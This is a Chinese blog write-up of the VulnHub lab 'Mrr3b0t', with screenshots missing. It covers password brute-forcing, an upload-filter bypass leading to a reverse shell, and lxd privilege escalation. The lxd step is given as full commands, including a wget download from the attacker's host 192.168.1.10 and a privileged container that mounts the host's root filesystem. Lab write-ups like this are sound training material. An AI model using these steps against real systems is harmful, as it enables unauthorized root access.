VulnHub靶场之Bizarre Adventure: Mrr3b0t

VulnHub靶场之Bizarre Adventure: Mrr3b0t

扫描IP以及端口:
在这里插入图片描述
访问80,一个模板网站,,,扫描目录:
在这里插入图片描述
不可描述的flag.txt.txt,去看看:
在这里插入图片描述
没找到,去看看administrator,尝试弱密码,登陆失败,没有用户名密码错误提升啥的:
在这里插入图片描述
继续寻找flag.txt.txt提示的hidden,,,再images中找到一个名叫hidden的图片:
在这里插入图片描述
去在线解密一下:
在这里插入图片描述
得到一个用户名mrrobot,需要进行暴力破解,,,
直接用bp抓包进行破解,这里我使用的是rockyou.txt,1000多万的字典,,,:
在这里插入图片描述
登录:
在这里插入图片描述
文件上传,,,,过滤了:The image format must be jpg,jpeg,gif,png
抓包进行修改:
在这里插入图片描述
就是上传到administrator目录下,访问,监听,,
在这里插入图片描述
获取到shell,,获取交互式shell:
在这里插入图片描述
查看用户存在一个exploiter用户:
在这里插入图片描述
继续查找可用文件,,找到一个buffer:
在这里插入图片描述
不会吧不会吧,不会又是pwn之类的吧,,strings查看一下:
在这里插入图片描述
找到一个密码,su expoliter:
在这里插入图片描述
sudo -l查看一下,不能运行sudo,,:
在这里插入图片描述
id看看,有lxd,,,可以尝试lxd提权:
在这里插入图片描述
具体方法请看这篇文章:Lxd Privilege Escalation
先在本地执行如下命令:

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

一开始一直failed,之后更新一下kali就好了:
在这里插入图片描述
可以看在目录下生成一个tar.gz文件:
在这里插入图片描述
上传到shell服务器上,,,
在这里插入图片描述
服务器上下载:

cd /tmp
wget http://192.168.1.10:8000/apline-v3.12-x86_64-20201004_1015.tar.gz

在这里插入图片描述
生成映像后,可以将其作为映像添加到LXD中:

lxc image import ./apline-v3.12-x86_64-20201004_1015.tar.gz --alias myimage

在这里插入图片描述
使用list命令检查镜像列表:

lxc image list

在这里插入图片描述
继续执行命令:

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

在这里插入图片描述
在这里插入图片描述
成功获取到flag:
在这里插入图片描述

小结

几经波折,,,学到了许多东西,首先收获最大的就是lxd提权,第一次做,
找了很多文章,错误百出,不过好在最后解决了,,遇见问题不要慌张,慢慢去解决
曾经提权这一部分几度想放弃了,,,,lxd提权这部分需要消化理解吸收,还需加强自身实力

猜你喜欢

转载自blog.csdn.net/qq_42967398/article/details/108918080